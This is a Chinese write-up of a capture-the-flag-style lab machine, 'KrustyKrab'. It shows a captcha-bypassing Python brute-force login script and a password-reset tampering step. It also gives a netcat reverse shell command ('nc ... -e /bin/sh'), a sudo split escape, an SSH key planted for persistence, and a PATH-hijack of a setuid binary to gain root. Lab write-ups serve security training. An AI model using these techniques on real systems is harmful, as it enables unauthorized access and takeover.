image-20250528202444683

踩点

image-20250528210323627

80端口访问是一个Apache 默认页

在源码中得到

/var/www/html/finexo

访问finexo

有登录功能

image-20250528210635599

第一个用户存在

在登录页面的源码中发现js文件

image-20250528210751072

image-20250528210800494

很明显的jsfuck

解出

plaintext
function generateCaptcha() {
$characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
$code = "";
$seed = time();
mt_srand($seed);
for ($i = 0; $i < 4; $i++) {
$code .= $characters[mt_rand(0, strlen($characters) - 1)];
}
$_SESSION['captcha'] = strtolower($code);
return $code;
}

得到了验证码的生成逻辑

依靠Unix时间戳挑选出四个字母组成验证码

image-20250528213457184

发现访问http://ip/finexo/login.php?action=generateCaptcha

直接就会给出验证码我们写爆破脚本访问那验证码即可

plaintext
import requests # 导入 requests 库,用于发送 HTTP 请求

# 定义目标 URL
# 注意:请确保这里的 IP 地址是你要测试的实际目标 IP!
# 根据之前的讨论,如果是原来的目标,应该是 'http://192.168.56.132/finexo/login.php'
captcha_url = 'http://192.168.56.132/finexo/login.php?action=generateCaptcha' # 验证码生成接口的 URL
login_url = 'http://192.168.56.132/finexo/login.php' # 登录页面的 URL

# 创建会话对象
# 使用 requests.Session() 可以保持会话(例如,管理 cookies),这对于登录和验证码机制至关重要。
session = requests.Session()

cnt = 0 # 初始化尝试次数计数器

# 打开 rockyou.txt 字典文件
# 'r' 表示只读模式,encoding="utf-8" 指定文件编码,errors="ignore" 忽略编码错误
with open('rockyou.txt', 'r', encoding="utf-8", errors="ignore") as f:
# 遍历字典文件中的每一行(每个密码)
for password in f.readlines():

# 步骤1: 获取验证码
# 向验证码生成接口发送 GET 请求,获取响应文本,去除空白字符,并转换为小写。
# 这是利用了验证码文本直接返回给前端的漏洞点。
try:
captcha_response = session.get(captcha_url)
captcha = captcha_response.text.strip().lower()
if not captcha: # 如果获取到的验证码为空,则跳过此次尝试
print(f" [警告] 无法获取验证码,跳过密码: {password.strip()}")
continue
except requests.exceptions.RequestException as e:
print(f" [错误] 获取验证码失败: {e},跳过密码: {password.strip()}")
continue

# 去除从字典文件中读取的密码两端的空白字符(如换行符)
password = password.strip()

# 构造登录请求的 POST 数据
data = {
'username': 'spongebob', # 确定用户名为 'spongebob'
'password': f'{password}', # 使用当前字典中的密码
'captcha': captcha # 使用实时获取到的验证码
}

# 步骤2: 发送 POST 请求进行登录
# 使用会话对象发送数据到登录 URL
try_login = session.post(login_url, data=data)
cnt += 1 # 每次尝试后增加计数

# 输出当前尝试的密码和总尝试次数,便于跟踪进度
print(f"正在尝试密码: {password} (第 {cnt} 次尝试)")

# 步骤3: 检查登录结果
# 判断响应文本中是否包含表示登录成功的关键词 "successful"
if "successful" in try_login.text:
print(f"\n--- 成功!---")
print(f"登录成功,找到密码: {password}")
# 找到密码后,立即停止循环
break
# 如果你还想查看其他非成功非明确错误的响应,可以在这里添加更详细的条件和打印。
# 目前脚本只打印成功信息。

根据靶机无处不在的海绵宝宝元素生成密码本进行爆破

plaintext
spongebob
Spongebob
SPONGEBOB
spongebob1
spongebob123
spongebob@
spongebob!
spongebob_squarepants
SpongeBobSquarePants
squarepants
Squarepants
patrick
Patrick
PATRICK
patrick123
star
Star
squidward
Squidward
SQUIDWARD
tentacles
mrkrabs
Mrkrabs
MrKrabs
krabs
Krabs
pearl
Pearl
sandy
Sandy
chipmunk
plankton
Plankton
chum
bucket
ChumBucket
gary
Gary
meow
pineapple
Pineapple
bikini
bottom
BikiniBottom
krabbypatty
KrabbyPatty
formula
secretformula
jellyfish
Jellyfish
net
bubble
Bubble
blower
clarinet
Clarinet
gloveworld
GloveWorld
rockbottom
RockBottom
goofygoober
GoofyGoober
jellyfishing
Jellyfishing
chumbucket
kelprea
thekrustykrab
KrustyKrab
finexo
Finexo
finexo123
finexo@
finexo!

image-20250528214610227

成功得到密码SpongeBob/squarepants

image-20250528221624985

可以上传图片🐎

但是抓住这个包可以改身份

但是不能利用

image-20250529134904893

可以直接更改身份为Administratro但是失败了不能直接变为Administratro但是我们仍然成功为Administratro更改了密码

image-20250529135541104

成功登录

image-20250529135654682

管理员就是好可以直接执行命令

plaintext
nc 192.168.56.103 8888 -e /bin/sh

监听得到shell

plaintext
www-data@KrustyKrab:/home$ sudo -l
Matching Defaults entries for www-data on KrustyKrab:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on KrustyKrab:
(KrustyKrab) NOPASSWD: /usr/bin/split

plaintext
www-data@KrustyKrab:/home$ sudo -u KrustyKrab split --filter=/bin/sh /dev/stdin
whoami
KrustyKrab

在KrustyKrab目录下得到userflag

权限维持可以搞个ssh密钥登陆

plaintext
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0lTDrkYOmPAyKqDSdWVZuDsOnMhScsUK765Po98D9HXbhTKDUbBQ6QhcfTOfiKI/rTK8sgKyulNd6Uyf/MBV7YT6qOtzP7fQ054PFZQViXQNwtcsFmyFLHlnpZzsfoC1eW3EX1/6pyNWfNr+SZrbWJOnaqTzq5ajT9Yob/BSMjrFFnckfqlfFSryTVTFtT64wlyo2x7o6aE9Fvc7b/tWqBZT/H2EqRFZ/4mwz69jrXO6xwhxbNDpPclwhSCR1POMy5HYMPB1cV2vCG+ecwqYR1tbpb5FsksJlKKZe4PPueYBTR1LkIrm12kLLiTzcdcXnVsBtiTrtv/NEi0VwMeD9UWwaUW2k31sE2cehVHeVlas1vQg/t51/kVfTptlrvPWxjSClzxh+Nxtb9AlE87f+9Km2CgwdG9q4UZ4T6sc0xTbtva/N+FEPKuq9kV9Hn7LrLFG9XlkttLh4NggFRW0ddRT3HlJkpJ52LkxaB4+OjoomPp4/LcS7RUkKnn1gEns= root@kali">~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
plaintext
┌──(root㉿kali)-[/myift/krus]
└─# ssh KrustyKrab@192.168.56.132 -i id_rsa
The authenticity of host '192.168.56.132 (192.168.56.132)' can't be established.
ED25519 key fingerprint is SHA256:0d4MWSfQ+tUZ0f4j8Wea2uYelBzzcaj0CI4NtYQIx0E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.132' (ED25519) to the list of known hosts.
Linux KrustyKrab 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1 (2023-05-08) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 00:15:24 2025 from 192.168.56.118
KrustyKrab@KrustyKrab:~$

KrustyKrab目录下还有个help图片

plaintext
┌──(root㉿kali)-[/myift/krus]
└─# file help
help: GIF image data, version 89a, 480 x 270

KrustyKrab@KrustyKrab:~$ sudo -l
Matching Defaults entries for KrustyKrab on KrustyKrab:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User KrustyKrab may run the following commands on KrustyKrab:
(spongebob) NOPASSWD: /usr/bin/ttteeesssttt

image-20250529153951742

使用/usr/bin/ttteeesssttt操作

plaintext
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt

Spongebob forgot how to make Krabby Patty, You need to help him!

Current shuffled recipe order:
A: Pickles
B: Ketchup
C: Lettuce
D: Patty
E: Onion
F: Top bun
G: Mustard
H: Cheese
I: Tomato
J: Bottom bun

Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J):

答案就在动图中

image-20250529154515733

image-20250529154523604

image-20250529154534468

plaintext
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt

Spongebob forgot how to make Krabby Patty, You need to help him!

Current shuffled recipe order:
A: Tomato
B: Onion
C: Lettuce
D: Ketchup
E: Pickles
F: Top bun
G: Patty
H: Cheese
I: Bottom bun
J: Mustard

Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J): IGCHBADJEF

Validation successful! Perfect Krabby Patty!
spongebob@KrustyKrab:/home/KrustyKrab$

直接就来到了spongebob用户

plaintext
spongebob@KrustyKrab:/home/KrustyKrab$ cd
spongebob@KrustyKrab:~$ ls
key1 key2.jpeg note.txt
spongebob@KrustyKrab:~$ file key1
key1: ASCII text
spongebob@KrustyKrab:~$ cat key1
e1964798cfe86e914af895f8d0291812
spongebob@KrustyKrab:~$ cat note.txt

Squidward is waiting for you!!!!

password is md5($key1$key2).

It's not so hard as you think.

You have new mail in /var/mail/spongebob
章鱼哥在等你!!!!

密码为md5($key1$key2)。

没有你想的那么难。

在/var/mail/spongebob中有新邮件
spongebob@KrustyKrab:~$

image-20250529155642899

(好帅的章鱼哥)

本来以为key2藏在里面结果是我想多了

直接拿图片的md5值

plaintext
┌──(root㉿kali)-[/myift/krus]
└─# md5sum key2.jpeg
5e1d0c1a168dc2d70004c2b00ba314ae key2.jpeg

直接计算

plaintext
┌──(root㉿kali)-[/myift/krus]
└─# echo -n "e1964798cfe86e914af895f8d02918125e1d0c1a168dc2d70004c2b00ba314ae" | md5sum
7ac254848d6e4556b73398dde2e4ef82 -
plaintext
spongebob@KrustyKrab:/home$ su Squidward
Password:
$ whoami
Squidward

登录成功

plaintext
$ find / -perm -u=s -type f 2>/dev/null
/home/Squidward/laststep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/sbin/exim4

发现可利用文件laststep

plaintext
$ file laststep
laststep: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b84dc5079c77a9f2f2d82492f95a9c110ec51c87, for GNU/Linux 3.2.0, not stripped
$ strings laststep
/lib64/ld-linux-x86-64.so.2
setgid
setuid
system
__libc_start_main
__cxa_finalize
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
cat /etc/shadow
;*3$"
GCC: (Debian 12.2.0-14) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
system@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
setgid@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

可执行文件执行

cat /etc/shadow

cat不是绝对路径调用可以进行路径劫持

plaintext
$ echo bash > cat
$ ls
cat laststep
$ chmod 777 cat
$ PATH=.:$PATH
$ ./laststep
root@KrustyKrab:~#